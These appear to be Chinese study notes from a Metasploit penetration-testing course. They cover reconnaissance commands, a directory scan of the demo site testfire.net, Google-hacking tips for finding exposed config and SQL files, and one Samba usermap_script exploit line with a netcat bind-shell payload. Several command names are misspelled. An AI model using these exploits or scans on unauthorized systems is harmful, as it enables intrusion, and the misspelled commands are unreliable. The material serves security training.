Metasloit渗透测试魔鬼训练营

总结一句话  漏洞  攻击   拿权限  维持访问

课程目标

掌握黑客渗透攻击流程

掌握常用攻击软件     渗透测试工程师

掌握常见windows漏洞挖掘和攻击

掌握常见linux漏洞挖掘和攻击

参考书籍

《Metasploit渗透测试指南》肯尼（行业经典） 最详细

《Metasloit渗透测试魔鬼训练营》 诸葛建伟（国内经典） 靠谱、拓扑图

《网络攻防技术与实践》诸葛建伟（清华大学网络安全课） 基础入门

《黑客大曝光》--经典，编程****************************************

讲义目录

常用命令

startx 进入图形界面

进入unity模式

whois pinginglab.com

有相关信息

nsloopup    set type=A  /填写特定的域名/  dns

dig   为准

arpping    arp-scan --interface=eth2 10.10.10.0/24

网段扫描  nbtscan 172.17.21.0/24

主机扫描  nmap 172.17.21.96 -a 可带参数

meta环境 msfconsole

msf > use auxiliary/scanner/discovery/arp_sweep

************************************************

wifi密码破解

************************************************

msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=10.10.10.254 E

********************************************************************************************************************************************************

工具介绍

环境搭建  （连通性测试）

testfire.net

msf>whois testfire.com   查询域名信息

root@bt：~#  nsloopup

>set type=A  ;;设置对其ip地址进行解析  MX查找其邮件转发

>testfire.net   ;;域名或ip

...........................   

>exit

root@bt：~# dig @ns.watson.ibm.com testfire.net  ;;

............................

使用Google hacking技术搜索网站目录

扩展名inc：可能包含网站配置信息，如数据库用户名/口令

扩展名bak：通常是一些文本编辑器源代码留下的备份文件，程序脚本文件大致内容

扩展名tex或sql：sql脚本，数据库结构等信息

使用dir_scanner辅助模块来搜索网站目录（testfire.net）

msf > use auxiliary/scanner/http/dir_scanner
msf  auxiliary(dir_scanner) > set THREADS 100
THREADS => 100
msf  auxiliary(dir_scanner) > set RHOSTS www.testfire.net
RHOSTS => www.testfire.net
msf  auxiliary(dir_scanner) > exploit

...........................................；；发现一个Admin隐藏目录，返回HTTP 403

端口扫描

arp_sweep 扫描

msf >use auxiliary/scanner/discovery/arp_sweep

namp 扫描

直接  namp -A ip

msf>namp -PU -sn ip

操作系统辨别

msf >nmap -O  ip